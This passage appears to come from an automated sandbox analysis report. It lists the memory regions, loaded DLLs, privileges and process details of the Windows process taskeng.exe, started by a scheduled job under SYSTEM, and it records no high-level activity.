| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:49, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:37 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x5c8 |
| Parent PID | 0x354 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Groups |
|
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
AE8
0x
7C8
0x
7C4
0x
7B8
0x
7A8
0x
5CC
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00200000 | 0x00266fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000370000 | 0x00370000 | 0x004f7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000500000 | 0x00500000 | 0x00680fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000690000 | 0x00690000 | 0x0074ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000750000 | 0x00750000 | 0x00b42fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000b50000 | 0x00b50000 | 0x00b50fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b60000 | 0x00b60000 | 0x00c5ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x00c60fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000d50000 | 0x00d50000 | 0x00dcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000e30000 | 0x00e30000 | 0x00eaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000f70000 | 0x00f70000 | 0x00feffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001020000 | 0x01020000 | 0x0109ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x010b0000 | 0x0137efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001470000 | 0x01470000 | 0x014effff | Private Memory | Readable, Writable |
|
|
|
|
| kernel32.dll | 0x77320000 | 0x7743efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77440000 | 0x77539fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77540000 | 0x776e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| taskeng.exe | 0xffe30000 | 0xffea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| tschannel.dll | 0x7fef6130000 | 0x7fef6138fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| xmllite.dll | 0x7fefb380000 | 0x7fefb3b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ktmw32.dll | 0x7fefb3c0000 | 0x7fefb3c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefca60000 | 0x7fefcaa6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x7fefceb0000 | 0x7fefcec6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wevtapi.dll | 0x7fefcfb0000 | 0x7fefd01cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x7fefd350000 | 0x7fefd374fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x7fefd380000 | 0x7fefd38efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x7fefd470000 | 0x7fefd483fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x7fefd680000 | 0x7fefd6eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x7fefd860000 | 0x7fefd98cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x7fefd990000 | 0x7fefda28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x7fefda30000 | 0x7fefda5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x7fefdb00000 | 0x7fefdbdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x7fefdd60000 | 0x7fefddc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x7fefddd0000 | 0x7fefded8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x7fefdee0000 | 0x7fefdfa8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x7fefed40000 | 0x7fefeddefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x7fefede0000 | 0x7fefefe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x7feff2b0000 | 0x7feff320fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x7feff330000 | 0x7feff33dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x7feff5b0000 | 0x7feff5cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x7feff5d0000 | 0x7feff6a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x7feff860000 | 0x7feff860fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
|
